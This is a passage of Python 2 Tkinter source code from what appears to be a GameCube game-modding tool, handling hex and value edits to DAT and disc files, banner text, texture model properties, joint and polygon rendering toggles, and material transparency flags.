currentFileHex = hexlify( globalDatFile.getData(widget.offsets, widget.byteLength) ).upper()
if currentFileHex == newHex:
return # No change to be updated
# Get the data as a bytearray, and check for other GUI compoenents that may need to be updated
newData = bytearray.fromhex( newHex )
valueEntryWidget = getattr( widget, 'valueEntryWidget', None )
formatting = getattr( widget, 'formatting', None )
decodedValue = None
if len( newData ) != widget.byteLength: # Thanks to the zfill above, this should only happen if the hex entry is too long
msg( 'The new value must be ' + str( widget.byteLength ) + ' characters long.' )
return
if valueEntryWidget and formatting:
# Check that the appropriate value can be decoded from this hex (if formatting is available)
try:
decodedValue = struct.unpack( '>' + formatting, newData )
except Exception as err:
# Construct and display an error message for the user
dataTypes = { '?': 'a boolean', 'b': 'a signed character', 'B': 'an unsigned character', # 1-byte
'h': 'a signed short (halfword)', 'H': 'an unsigned short', # 2-bytes
'i': 'a signed integer', 'I': 'an unsigned integer', 'f': 'a float' } # 4-bytes
if formatting in dataTypes:
expectedLength = struct.calcsize( formatting )
msg( 'The entered value is invalid for {} value (should be {} byte(s)).'.format( dataTypes[formatting], expectedLength ) )
else: # I tried
msg( 'The entered value is invalid.' )
print err
return
# Change the background color of the widget, to show that changes have been made to it and are pending saving.
widget.configure( background='#faa' )
# If this entry has a color swatch associated with it, redraw it.
colorSwatchWidget = getattr( widget, 'colorSwatch', None )
if colorSwatchWidget:
#print 'recreating color swatch image with', newHex
widget.colorSwatch.renderCircle( newHex )
# Add the widget to a list, to keep track of what widgets need to have their background restored to white when saving.
global editedDatEntries
editedDatEntries.append( widget )
# Update the hex shown in the widget (in case the user-entered value was zfilled; i.e. was not long enough)
widget.delete( 0, 'end' )
widget.insert( 0, newHex )
# Update the data shown in the neighboring, decoded value widget
if decodedValue:
valueEntryWidget.delete( 0, 'end' )
valueEntryWidget.insert( 0, decodedValue )
valueEntryWidget.configure( background='#faa' )
editedDatEntries.append( valueEntryWidget )
# Replace the data in the file for each location
updateName = widget.updateName.replace( '\n', ' ' )
descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName
if type( widget.offsets ) == list:
for offset in widget.offsets:
globalDatFile.updateData( offset, newData, descriptionOfChange )
else: # The offsets attribute is just a single value (the usual case)
globalDatFile.updateData( widget.offsets, newData, descriptionOfChange )
updateProgramStatus( updateName + ' Updated' )
def updateEntryValue( event ):
""" Formats a value in an entry field and updates it into the currently loaded DAT file.
Able to update multiple locations in the file if widget.offset is a list of offsets. """
if event.__class__ == HexEditDropdown:
widget = event
else:
widget = event.widget
# Validate the entered value by making sure it can be correctly encoded
try:
formatting = widget.formatting
if formatting == 'f':
newHex = hexlify( struct.pack( '>f', float(widget.get()) ) ).upper()
else:
newHex = hexlify( struct.pack( '>' + formatting, int(widget.get()) ) ).upper()
except Exception as err:
# Construct and display an error message for the user
dataTypes = { '?': 'a boolean', 'b': 'a signed character', 'B': 'an unsigned character', # 1-byte
'h': 'a signed short (halfword)', 'H': 'an unsigned short', # 2-bytes
'i': 'a signed integer', 'I': 'an unsigned integer', 'f': 'a float' } # 4-bytes
if formatting in dataTypes:
msg( 'The entered value is invalid for {} value.'.format( dataTypes[formatting] ) )
else: # I tried
msg( 'The entered value is invalid.' )
print err
return
# Confirm whether updating is necessary by checking if this is actually new data for any of the offset locations
if type( widget.offsets ) == list:
for offset in widget.offsets:
currentFileHex = hexlify( globalDatFile.getData(offset, widget.byteLength) ).upper()
if currentFileHex != newHex: # Found a difference
break
else: # The loop above didn't break; no change found
return # No change to be updated
else: # The offsets attribute is just a single value (the usual case)
currentFileHex = hexlify( globalDatFile.getData(widget.offsets, widget.byteLength) ).upper()
if currentFileHex == newHex:
return # No change to be updated
# Change the background color of the widget, to show that changes have been made to it and are pending saving.
if event.__class__ == HexEditDropdown:
widget.configure( style='Edited.TMenubutton' )
else:
widget.configure( background='#faa' )
# Add the widget to a list, to keep track of what widgets need to have their background restored to white when saving.
global editedDatEntries
editedDatEntries.append( widget )
# Update the data shown in the neiboring widget
hexEntryWidget = getattr( widget, 'hexEntryWidget', None )
if hexEntryWidget:
hexEntryWidget.delete( 0, 'end' )
hexEntryWidget.insert( 0, newHex )
hexEntryWidget.configure( background='#faa' )
editedDatEntries.append( hexEntryWidget )
# Replace the data in the file for each location
newData = bytearray.fromhex( newHex )
updateName = widget.updateName.replace( '\n', ' ' )
descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName
if type( widget.offsets ) == list:
for offset in widget.offsets:
globalDatFile.updateData( offset, newData, descriptionOfChange )
else: # The offsets attribute is just a single value (the usual case)
globalDatFile.updateData( widget.offsets, newData, descriptionOfChange )
updateProgramStatus( updateName + ' Updated' )
def updateDiscDetails( event ):
offset = event.widget.offset # In this case, these ARE counting the file header
maxLength = event.widget.maxByteLength
targetFile = event.widget.targetFile # Defines the file this disc detail resides in. Will be a string of either 'opening.bnr' or 'boot.bin'
# Return if the Shift key was held while pressing Enter (indicating the user wants a line break).
modifierKeysState = event.state # An int. Check individual bits for mod key status'; http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
shiftDetected = (modifierKeysState & 0x1) != 0 # Checks the first bit of the modifiers
if shiftDetected: return # Not using "break" on this one in order to allow event propagation
# Determine what encoding to use for saving text
if Gui.countryCode.get() == 'us': encoding = 'latin_1' # Decode assuming English or other European countries
else: encoding = 'shift_jis' # The country code is 'jp', for Japanese.
# Get the currently entered text as hex
if event.widget.winfo_class() == 'TEntry' or event.widget.winfo_class() == 'Entry':
inputBytes = event.widget.get().encode( encoding )
else: inputBytes = event.widget.get( '1.0', 'end' )[:-1].encode( encoding ) # "[:-1]" ignores trailing line break
newStringHex = hexlify( inputBytes )
# Cancel if no banner file appears to be loaded (which means there's no disc with a boot.bin either).
if not globalBannerFile: return 'break'
# Get the data for the target file (Could be for boot.bin or opening.bnr)
if targetFile == 'opening.bnr':
targetFileData = globalBannerFile.data
else: # Updating to disc.
targetFileIid = scanDiscForFile( targetFile )
if not targetFileIid:
msg( targetFile + ' could not be found in the disc!' )
return 'break'
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( targetFileIid, 'values' )
targetFileData = getFileDataFromDiscTreeAsBytes( targetFileIid )
# Get the hex string of the current value/field in the file
currentHex = hexlify( targetFileData[offset:offset+maxLength] )
# Pad the end of the input string with empty space (up to the max string length), to ensure any other text in the file will be erased
newPaddedStringHex = newStringHex + ( '0' * (maxLength * 2 - len(newStringHex)) )
# Check if the value is different from what is already saved.
if currentHex != newPaddedStringHex:
updateName = event.widget.updateName
if updateName == 'Game ID' and len( newStringHex ) != maxLength * 2:
msg( 'The new value must be ' + str(maxLength) + ' characters long.' )
elif len( newStringHex ) > maxLength * 2:
msg( 'The text must be less than ' + str(maxLength) + ' characters long.' )
else:
# Change the background color of the widget, to show that changes have been made to it and are pending saving.
event.widget.configure( background="#faa" )
# Add the widget to a list, to keep track of what widgets need to have their background restored to white when saving.
editedBannerEntries.append( event.widget )
if targetFile == 'opening.bnr':
descriptionOfChange = updateName + ' modified in ' + globalBannerFile.fileName
globalBannerFile.updateData( offset, bytearray.fromhex( newPaddedStringHex ), descriptionOfChange )
else:
global unsavedDiscChanges
targetFileData[offset:offset+maxLength] = bytearray.fromhex( newPaddedStringHex )
Gui.isoFileTree.item( targetFileIid, values=('Disc details updated', entity, isoOffset, fileSize, isoPath, 'ram', hexlify(targetFileData)), tags='changed' )
unsavedDiscChanges.append( updateName + ' updated.' )
updateProgramStatus( updateName + ' Updated' )
return 'break' # Prevents the 'Return' keystroke that called this from propagating to the widget and creating a line break
def onTextureTreeSelect( event, iid='' ):
# Ensure there is an iid, or do nothing
if not iid:
iid = Gui.datTextureTree.selection()
if not iid: return
iid = iid[-1] # Selects the lowest position item selected in the treeview if multiple items are selected.
currentTab = Gui.root.nametowidget( Gui.imageManipTabs.select() )
# Update the main display with the texture's stored image.
drawTextureToMainDisplay( iid )
# Collect info on the texture
imageDataOffset, imageDataLength, width, height, imageType = parseTextureDetails( iid )
imageDataStruct = globalDatFile.structs.get( imageDataOffset )
if imageDataStruct:
imageDataHeaderOffsets = imageDataStruct.getParents()
# Determine whether to enable and update the Palette tab.
if imageType == 8 or imageType == 9 or imageType == 10:
# Enable the palette tab and prepare the data displayed on it.
Gui.imageManipTabs.tab( 1, state='normal' )
populatePaletteTab( int(iid), imageDataLength, imageType )
else:
# No palette for this texture. Check the currently viewed tab, and if it's the Palette tab, switch to the Image tab.
if currentTab == Gui.palettePane:
Gui.imageManipTabs.select( Gui.textureTreeImagePane )
Gui.imageManipTabs.tab( Gui.palettePane, state='disabled' )
wraplength = Gui.imageManipTabs.winfo_width() - 20
lackOfUsefulStructsDescription = ''
# Check if this is a file that doesn't have image data headers :(
if (0x1E00, 'MemSnapIconData') in globalDatFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'
elif (0x4E00, 'MemCardIconData') in globalDatFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'
elif (0, 'SIS_MenuData') in globalDatFile.rootNodes: # SdMenu.dat/.usd
lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'
elif isEffectsFile( globalDatFile ):
lastEffTextureOffset = getattr( globalDatFile, 'lastEffTexture', -1 ) # Only relavant with effects files
if imageDataOffset <= lastEffTextureOffset:
e2eHeaderOffset = imageDataStruct.imageHeaderOffset
textureCount = struct.unpack( '>I', globalDatFile.getData(e2eHeaderOffset, 4) )[0]
lackOfUsefulStructsDescription = ( 'Effects files have unique structuring for some textures, like this one, '
'which do not have a typical image data header, texture object, or other common structures.' )
if textureCount == 1:
lackOfUsefulStructsDescription += ' This texture is not grouped with any other textures,'
elif textureCount == 2:
lackOfUsefulStructsDescription += ' This texture is grouped with 1 other texture,'
else:
lackOfUsefulStructsDescription += ' This texture is grouped with {} other textures,'.format( textureCount )
lackOfUsefulStructsDescription += ' with an E2E header at 0x{:X}.'.format( 0x20+e2eHeaderOffset )
elif not imageDataStruct: # Make sure an image data struct exists to check if this might be something like a DOL texture
lackOfUsefulStructsDescription = ( 'There are no image data headers or other structures associated '
'with this texture. These are stored end-to-end in this file with '
'other similar textures.' )
elif not imageDataHeaderOffsets:
lackOfUsefulStructsDescription = 'This file has no known image data headers, or other structures to modify.'
Gui.texturePropertiesPane.clear()
Gui.texturePropertiesPane.flagWidgets = [] # Useful for the Flag Decoder to more easily find widgets that need updating
# If the following string has something, there isn't much customization to be done for this texture
if lackOfUsefulStructsDescription:
# Disable the model parts tab, and if on that tab, switch to the Image tab.
if currentTab == Gui.modelPropertiesPane:
Gui.imageManipTabs.select( Gui.textureTreeImagePane )
Gui.imageManipTabs.tab( Gui.modelPropertiesPane, state='disabled' )
# Add some info to the texture properties tab
Gui.imageManipTabs.tab( Gui.texturePropertiesPane, state='normal' )
ttk.Label( Gui.texturePropertiesPane.interior, text=lackOfUsefulStructsDescription, wraplength=wraplength ).pack( pady=30 )
return # Nothing more to say about this texture
# Enable and update the Model tab
Gui.imageManipTabs.tab( Gui.modelPropertiesPane, state='normal' )
populateModelTab( imageDataHeaderOffsets, wraplength )
# Enable and update the Properties tab
Gui.imageManipTabs.tab( Gui.texturePropertiesPane, state='normal' )
populateTexPropertiesTab( wraplength, width, height, imageType )
def populateModelTab( imageDataHeaderOffsets, wraplength ):
modelPane = Gui.modelPropertiesPane.interior
vertPadding = 10
# Clear the current contents
Gui.modelPropertiesPane.clear()
modelPane.imageDataHeaders = []
modelPane.nonImageDataHeaders = [] # Not expected
modelPane.textureStructs = [] # Direct model attachments
modelPane.headerArrayStructs = [] # Used for animations
modelPane.unexpectedStructs = []
# Double-check that all of the parents are actually image data headers, and get grandparent structs
for imageHeaderOffset in imageDataHeaderOffsets: # This should exclude any root/reference node parents (such as a label)
headerStruct = globalDatFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderOffset )
if headerStruct:
modelPane.imageDataHeaders.append( headerStruct )
# Check the grandparent structs; expected to be Texture Structs or Image Data Header Arrays
for grandparentOffset in headerStruct.getParents():
texStruct = globalDatFile.initSpecificStruct( hsdStructures.TextureObjDesc, grandparentOffset, printWarnings=False )
# Try getting or initializing a Texture Struct
if texStruct:
modelPane.textureStructs.append( texStruct )
else:
arrayStruct = globalDatFile.initSpecificStruct( hsdStructures.ImageHeaderArray, grandparentOffset, printWarnings=False )
# Try getting or initializing an Image Header Array Struct
if arrayStruct:
modelPane.headerArrayStructs.append( arrayStruct )
else:
# Initialize a general struct
modelPane.unexpectedStructs.append( globalDatFile.getStruct( grandparentOffset ) )
else:
# Attempt to initialize it in a generalized way (attempts to identify; returns a general struct if unable)
modelPane.nonImageDataHeaders.append( globalDatFile.getStruct(imageHeaderOffset) )
# Add a label for image data headers count
if len( modelPane.imageDataHeaders ) == 1: # todo: make searching work for multiple offsets
headerCountFrame = ttk.Frame( modelPane )
ttk.Label( headerCountFrame, text='Model Attachments (Image Data Headers): {}'.format(len(modelPane.imageDataHeaders)), wraplength=wraplength ).pack( side='left' )
PointerLink( headerCountFrame, modelPane.imageDataHeaders[0].offset ).pack( side='right', padx=5 )
headerCountFrame.pack( pady=(vertPadding*2, 0) )
else:
ttk.Label( modelPane, text='Model Attachments (Image Data Headers): {}'.format(len(modelPane.imageDataHeaders)), wraplength=wraplength ).pack( pady=(vertPadding*2, 0) )
# Add a notice of non image data header structs, if any.
if modelPane.nonImageDataHeaders:
print 'Non-Image Data Header detected as image data block parent!'
if len( modelPane.nonImageDataHeaders ) == 1:
nonImageDataHeadersText = '1 non-image data header detected: ' + modelPane.nonImageDataHeaders[0].name
else:
structNamesString = grammarfyList( [structure.name for structure in modelPane.nonImageDataHeaders] )
nonImageDataHeadersText = '{} non-image data headers detected: {}'.format( len(modelPane.nonImageDataHeaders), structNamesString )
ttk.Label( modelPane, text=nonImageDataHeadersText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
# Add details for Texture Struct or Material Struct attachments
if len( modelPane.textureStructs ) == 1:
textStructsText = 'Associated with 1 Texture Struct.'
else:
textStructsText = 'Associated with {} Texture Structs.'.format( len(modelPane.textureStructs) )
ttk.Label( modelPane, text=textStructsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
if len( modelPane.headerArrayStructs ) == 1:
arrayStructsText = 'Associated with 1 Material Animation.'
else:
arrayStructsText = 'Associated with {} Material Animations.'.format( len(modelPane.headerArrayStructs) )
ttk.Label( modelPane, text=arrayStructsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
if modelPane.unexpectedStructs:
unexpectedStructsText = 'Unexpected Grandparent Structs: ' + grammarfyList( [structure.name for structure in modelPane.nonImageDataHeaders] )
ttk.Label( modelPane, text=unexpectedStructsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
ttk.Separator( modelPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, vertPadding) )
# Get the associated material structs and display objects
modelPane.materialStructs = []
modelPane.displayObjects = []
for texStruct in modelPane.textureStructs:
for materialStructOffset in texStruct.getParents():
materialStruct = globalDatFile.initSpecificStruct( hsdStructures.MaterialObjDesc, materialStructOffset )
if materialStruct:
modelPane.materialStructs.append( materialStruct )
for displayObjOffset in materialStruct.getParents():
displayObject = globalDatFile.initSpecificStruct( hsdStructures.DisplayObjDesc, displayObjOffset )
if displayObject:
modelPane.displayObjects.append( displayObject )
# Display controls to adjust this texture's model transparency
# Set up the transparency control panel and initialize the control variables
transparencyPane = ttk.Frame( modelPane )
jointHidden = Tk.BooleanVar()
displayListDisabled = Tk.BooleanVar() # Whether or not display list length has been set to 0
modelPane.hideJointChkBtn = ttk.Checkbutton( transparencyPane, text='Disable Joint Rendering', variable=jointHidden, command=toggleHideJoint )
modelPane.hideJointChkBtn.var = jointHidden
modelPane.hideJointChkBtn.grid( column=0, row=0, sticky='w', columnspan=3 )
modelPane.polyDisableChkBtn = ttk.Checkbutton( transparencyPane, text='Disable Polygon (Display List) Rendering', variable=displayListDisabled, command=toggleDisplayListRendering )
modelPane.polyDisableChkBtn.var = displayListDisabled
modelPane.polyDisableChkBtn.grid( column=0, row=1, sticky='w', columnspan=3 )
ttk.Label( transparencyPane, text='Transparency Control:' ).grid( column=0, row=2, sticky='w', columnspan=3, padx=15, pady=(3, 4) )
opacityValidationRegistration = Gui.root.register( opacityEntryUpdated )
modelPane.opacityEntry = ttk.Entry( transparencyPane, width=7, justify='center', validate='key', validatecommand=(opacityValidationRegistration, '%P') )
modelPane.opacityEntry.grid( column=0, row=3 )
modelPane.opacityBtn = ttk.Button( transparencyPane, text='Set', command=setModelTransparencyLevel, width=4 )
modelPane.opacityBtn.grid( column=1, row=3, padx=4 )
modelPane.opacityScale = ttk.Scale( transparencyPane, from_=0, to=10, command=opacityScaleUpdated )
modelPane.opacityScale.grid( column=2, row=3, sticky='we' )
transparencyPane.pack( pady=(vertPadding, 0), expand=True, fill='x', padx=20 )
transparencyPane.columnconfigure( 0, weight=0 )
transparencyPane.columnconfigure( 1, weight=0 )
transparencyPane.columnconfigure( 2, weight=1 )
# Add a help button for texture/model disablement and transparency
helpText = ( 'Disabling Joint Rendering will set the "Hidden" flag (bit 4) for all of the lowest-level Joint Structures '
"connected to the selected texture (parents to this texture's Display Object(s)). That will be just "
"one particular Joint Struct in most cases, however that may be the parent for multiple parts of the model. "
"To have finer control over which model parts are disabled, consider the Disable Polygon Rendering option."
"\n\nDisabling Polygon Rendering is achieved by setting the display list data stream size to 0 "
"""(i.e. each associated Polygon Objects' "Display List Length"/"Display List Blocks" value). This is """
"done for each Polygon Object of each Display Object associated with this texture. For finer control, use "
'the Structural Analysis tab. There, you can even experiment with reducing the length of the list '
'to some other value between 0 and the original value, to render or hide different polygon groups.'
'\n\nTransparency Control makes the entire model part that this texture is attached to partially transparent. '
'This uses the value found in the Material Colors Struct by the same name, while setting multiple flags '
"within parenting structures. The flags set are 'Render No Z-Update' and 'Render XLU' of the Material Structs "
"(bits 29 and 30, respectfully), as well as 'XLU' and 'Root XLU' of the Joint Struct (bits 19 and 29). " )
helpBtn = ttk.Label( transparencyPane, text='?', foreground='#445', cursor='hand2' )
helpBtn.place( relx=1, x=-17, y=0 )
helpBtn.bind( '<1>', lambda e, message=helpText: msg(message, 'Disabling Rendering and Transparency') )
# Add widgets for Material Color editing
ttk.Separator( modelPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, vertPadding) )
ttk.Label( modelPane, text='Material Colors:' ).pack( pady=(vertPadding, 0) )
colorsPane = ttk.Frame( modelPane )
# Row 1; Diffusion and Ambience
ttk.Label( colorsPane, text='Diffusion:' ).grid( column=0, row=0, sticky='e' )
diffusionEntry = HexEditEntry( colorsPane, -1, 4, 'I', 'Diffusion' ) # Data offset (the -1) will be updated below
diffusionEntry.grid( column=1, row=0, padx=6 )
ttk.Label( colorsPane, text='Ambience:' ).grid( column=3, row=0, sticky='e' )
ambienceEntry = HexEditEntry( colorsPane, -1, 4, 'I', 'Ambience' ) # Data offset (the -1) will be updated below
ambienceEntry.grid( column=4, row=0, padx=6 )
# Row 2; Specular Highlights and Shininess
ttk.Label( colorsPane, text='Highlights:' ).grid( column=0, row=1, sticky='e', padx=(12, 0) )
highlightsEntry = HexEditEntry( colorsPane, -1, 4, 'I', 'Specular Highlights' ) # Data offset (the -1) will be updated below
highlightsEntry.grid( column=1, row=1, padx=6 )
ttk.Label( colorsPane, text='Shininess:' ).grid( column=3, row=1, sticky='e', padx=(12, 0) )
shininessEntry = HexEditEntry( colorsPane, -1, 4, 'f', 'Shininess' ) # Data offset (the -1) will be updated below
shininessEntry.grid( column=4, row=1, padx=6 )
colorsPane.pack( pady=(vertPadding, 0), expand=True, fill='x', padx=20 )
# print 'material structs:', [hex(0x20+obj.offset) for obj in modelPane.materialStructs]
# print 'displayObj structs:', [hex(0x20+obj.offset) for obj in modelPane.displayObjects]
# Set initial values for the transparency controls and material colors above, or disable them
if modelPane.displayObjects:
firstDisplayObj = modelPane.displayObjects[0]
# Get a parent Joint Object, and see if its hidden flag is set
for structureOffset in firstDisplayObj.getParents():
jointStruct = globalDatFile.initSpecificStruct( hsdStructures.JointObjDesc, structureOffset )
if jointStruct:
jointFlags = jointStruct.getValues( specificValue='Joint_Flags' )
jointHidden.set( jointFlags & 0b10000 ) # Checking bit 4
break
else: # The loop above didn't break; no joint struct parent found
modelPane.hideJointChkBtn.configure( state='disabled' )
ToolTip( modelPane.hideJointChkBtn, '(No parent Joint Object found.)', wraplength=400 )
# Check the current state of this model part's rendering; get the first Polygon Object, and see if its Display List Blocks/Length attribute is 0
polygonObjOffset = firstDisplayObj.getValues( specificValue='Polygon_Object_Pointer' )
polygonObj = globalDatFile.initSpecificStruct( hsdStructures.PolygonObjDesc, polygonObjOffset, firstDisplayObj.offset )
if polygonObj:
displayListBlocks = polygonObj.getValues( 'Display_List_Length' )
displayListDisabled.set( not bool(displayListBlocks) ) # Resolves to True if the value is 0, False for anything else
else:
displayListDisabled.set( False )
modelPane.polyDisableChkBtn.configure( state='disabled' )
# If we found display objects, we must have also found material structs; get its values
materialStruct = modelPane.materialStructs[0]
matColorsOffset = materialStruct.getValues()[3]
matColorsStruct = globalDatFile.initSpecificStruct( hsdStructures.MaterialColorObjDesc, matColorsOffset, materialStruct.offset )
diffusion, ambience, specularHighlights, transparency, shininess = matColorsStruct.getValues()
# Get all of the offsets that would be required to update the material color values
diffusionHexOffsets = []
ambienceHexOffsets = []
highlightsHexOffsets = []
shininessHexOffsets = []
for materialStruct in modelPane.materialStructs:
matColorsStructOffset = materialStruct.getValues( 'Material_Colors_Pointer' )
diffusionHexOffsets.append( matColorsStructOffset )
ambienceHexOffsets.append( matColorsStructOffset + 4 )
highlightsHexOffsets.append( matColorsStructOffset + 8 )
shininessHexOffsets.append( matColorsStructOffset + 0x10 )
# Set the transparency slider's value (which will also update the Entry widget's value)
modelPane.opacityScale.set( transparency * 10 ) # Multiplied by 10 because the slider's range is 0 to 10 (to compensate for trough-click behavior)
# Add an event handler to forces focus to go to the slider when it's clicked on (dunno why it doesn't do this already).
# This is necessary for the opacityScaleUpdated function to work properly
modelPane.opacityScale.bind( '<Button-1>', lambda event: modelPane.opacityScale.focus() )
# Add these values and color swatches to the GUI
diffusionHexString = '{0:0{1}X}'.format( diffusion, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
ambienceHexString = '{0:0{1}X}'.format( ambience, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
highlightsHexString = '{0:0{1}X}'.format( specularHighlights, 8 ) # Avoids the '0x' and 'L' appendages brought on by the hex() function. pads to 8 characters
diffusionEntry.insert( 0, diffusionHexString )
diffusionEntry.offsets = diffusionHexOffsets
diffusionEntry.colorSwatch = ColorSwatch( colorsPane, diffusionHexString, diffusionEntry )
diffusionEntry.colorSwatch.grid( column=2, row=0, padx=(0,2) )
ambienceEntry.insert( 0, ambienceHexString )
ambienceEntry.offsets = ambienceHexOffsets
ambienceEntry.colorSwatch = ColorSwatch( colorsPane, ambienceHexString, ambienceEntry )
ambienceEntry.colorSwatch.grid( column=5, row=0, padx=(0,2) )
highlightsEntry.insert( 0, highlightsHexString )
highlightsEntry.offsets = highlightsHexOffsets
highlightsEntry.colorSwatch = ColorSwatch( colorsPane, highlightsHexString, highlightsEntry )
highlightsEntry.colorSwatch.grid( column=2, row=1, padx=(0,2) )
shininessEntry.insert( 0, shininess )
shininessEntry.offsets = shininessHexOffsets
# Add bindings for input submission
diffusionEntry.bind( '<Return>', updateEntryHex )
ambienceEntry.bind( '<Return>', updateEntryHex )
highlightsEntry.bind( '<Return>', updateEntryHex )
shininessEntry.bind( '<Return>', updateEntryHex )
else:
# Disable the render checkbuttons and transparency controls
modelPane.hideJointChkBtn.configure( state='disabled' )
modelPane.polyDisableChkBtn.configure( state='disabled' )
modelPane.opacityEntry.configure( state='disabled' )
modelPane.opacityBtn.configure( state='disabled' )
# Disable the Material Color inputs
diffusionEntry.configure( state='disabled' )
ambienceEntry.configure( state='disabled' )
highlightsEntry.configure( state='disabled' )
shininessEntry.configure( state='disabled' )
# Add a label explaining why these are disabled
disabledControlsText = ('These controls are disabled because no Display Objects or Material Structs directly associated with this texture. '
'If this is part of a texture animation, find the default texture for it and adjust that instead.' )
ttk.Label( modelPane, text=disabledControlsText, wraplength=wraplength ).pack( pady=(vertPadding, 0) )
def toggleHideJoint():
""" Toggles the bit flag for 'Hidden' for each parent Joint Struct of the texture currently selected
in the DAT Texture Tree tab (last item in the selection if multiple items are selected). """
hideJoint = Gui.modelPropertiesPane.interior.hideJointChkBtn.var.get()
modifiedJoints = [] # Tracks which joint flags we've already updated, to reduce redundancy
# Iterate over the display objects of this texture, get their parent joint objects, and modify their flag
for displayObj in Gui.modelPropertiesPane.interior.displayObjects:
parentJointOffsets = displayObj.getParents()
for parentStructOffset in parentJointOffsets:
jointStruct = globalDatFile.initSpecificStruct( hsdStructures.JointObjDesc, parentStructOffset )
if jointStruct and parentStructOffset not in modifiedJoints:
# Change the bit within the struct values and file data, and record that the change was made
globalDatFile.updateFlag( jointStruct, 1, 4, hideJoint )
modifiedJoints.append( parentStructOffset )
updateProgramStatus( 'Joint Flag Updated' )
def toggleDisplayListRendering():
""" Toggles the defined length of the display lists associated with the currently texture currently selected
in the DAT Texture Tree tab (last item in the selection if multiple items are selected). """
clearDisplayList = Gui.modelPropertiesPane.interior.polyDisableChkBtn.var.get()
for displayObj in Gui.modelPropertiesPane.interior.displayObjects:
# Get the polygon object of this display object, as well as its siblings
polygonObjOffset = displayObj.getValues( 'Polygon_Object_Pointer' )
polygonObj = globalDatFile.initSpecificStruct( hsdStructures.PolygonObjDesc, polygonObjOffset, displayObj.offset )
polygonSiblingObjs = [globalDatFile.structs[o] for o in polygonObj.getSiblings()] # These should all be initialized through the .getSiblings method
# Process this object and its siblings
for polygonStruct in [polygonObj] + polygonSiblingObjs:
# Get info on this polygon object's display list
displayListLength, displayListPointer = polygonStruct.getValues()[4:6]
determinedListLength = globalDatFile.getStructLength( displayListPointer ) / 0x20
# Check the current display list length (when disabling) to make sure the value can be properly switched back
if clearDisplayList and displayListLength != determinedListLength:
msg( 'Warning! The display list length of ' + polygonStruct.name + ' was not the expected calculated value; '
'The current value is {}, while it was expected to be {}. '.format( displayListLength, determinedListLength ) + \
"This means if you want to be able to restore this value later, you'll need to write the current value "
'down, so you can restore it manually in the Structural Analysis tab.', 'Unexpected Display List Length' )
if clearDisplayList:
globalDatFile.updateStructValue( polygonStruct, 4, 0 )
else:
globalDatFile.updateStructValue( polygonStruct, 4, determinedListLength )
updateProgramStatus( 'Polygon Structs Updated' )
def opacityEntryUpdated( newValue ):
""" Handles events from the transparency Entry widget, when its value is changed.
This just validates the input, and updates the value on the slider.
newValue will initially be a string of a float. """
# Validate the input and convert it from a string to a decimal integer
try:
newValue = float( newValue.replace( '%', '' ) )
except:
if newValue == '':
newValue = 0
else:
return False
if newValue < 0 or newValue > 100:
return False
# Set the slider to the current value
newValue = newValue / 10
Gui.modelPropertiesPane.interior.opacityScale.set( newValue )
return True
def opacityScaleUpdated( newValue ):
""" Handles events from the transparency Slider widget, when its value is changed. The slider value ranges between 0 and 10,
(so that it's intervals when clicking in the trough jump a decent amount). The purpose of this function is just to
update the value in the Entry widget. 'newValue' will initially be a string of a float. """
newValue = round( float(newValue), 2 )
# If this is not the Entry widget causing a change in the value, update it too
if Gui.root.focus_get() != Gui.modelPropertiesPane.interior.opacityEntry:
# Set the entry widget to the current value (temporarily disable the validation function, so it's not called)
Gui.modelPropertiesPane.interior.opacityEntry.configure( validate='none')
Gui.modelPropertiesPane.interior.opacityEntry.delete( 0, 'end' )
Gui.modelPropertiesPane.interior.opacityEntry.insert( 0, str(newValue*10) + '%' )
Gui.modelPropertiesPane.interior.opacityEntry.configure( validate='key')
def setModelTransparencyLevel():
""" Calling function of the "Set" button under the Model tab's Transparency Control. """
opacityValue = Gui.modelPropertiesPane.interior.opacityScale.get() / 10
# Update the transparency value, and set required flags for this in the Material Struct
for materialStruct in Gui.modelPropertiesPane.interior.materialStructs:
matColorsOffset = materialStruct.getValues( 'Material_Colors_Pointer' )
matColorsStruct = globalDatFile.initSpecificStruct( hsdStructures.MaterialColorObjDesc, matColorsOffset, materialStruct.offset )
if matColorsStruct: # If the Material Struct doesn't have its colors struct, we probably don't need to worry about modifying it
# Change the transparency value within the struct values and file data, and record that the change was made
globalDatFile.updateStructValue( matColorsStruct, -2, opacityValue )
if opacityValue < 1.0: # Set the required flags (RENDER_NO_ZUPDATE and RENDER_XLU; i.e. bits 29 and 30)
globalDatFile.updateFlag( materialStruct, 1, 29, True ) # RENDER_NO_ZUPDATE
globalDatFile.updateFlag( materialStruct, 1, 30, True ) # RENDER_XLU
# else:
# globalDatFile.updateFlag( materialStruct, 1, 29, False )
# globalDatFile.updateFlag( materialStruct, 1, 30, False )
if opacityValue < 1.0: # Set flags required for this in the Joint Struct(s)
modifiedJoints = [] # Tracks which joint flags we've already updated, to reduce redundancy
# Iterate over the display objects of this texture, get their parent joint objects, and modify their flag
for displayObj in Gui.modelPropertiesPane.interior.displayObjects:
parentJointOffsets = displayObj.getParents()
for parentStructOffset in parentJointOffsets:
jointStruct = globalDatFile.initSpecificStruct( hsdStructures.JointObjDesc, parentStructOffset )
if jointStruct and parentStructOffset not in modifiedJoints:
# Change the bit within the struct values and file data, and record that the change was made
globalDatFile.updateFlag( jointStruct, 1, 19, True ) # XLU
#globalDatFile.updateFlag( jointStruct, 1, 28, True ) # ROOT_OPA
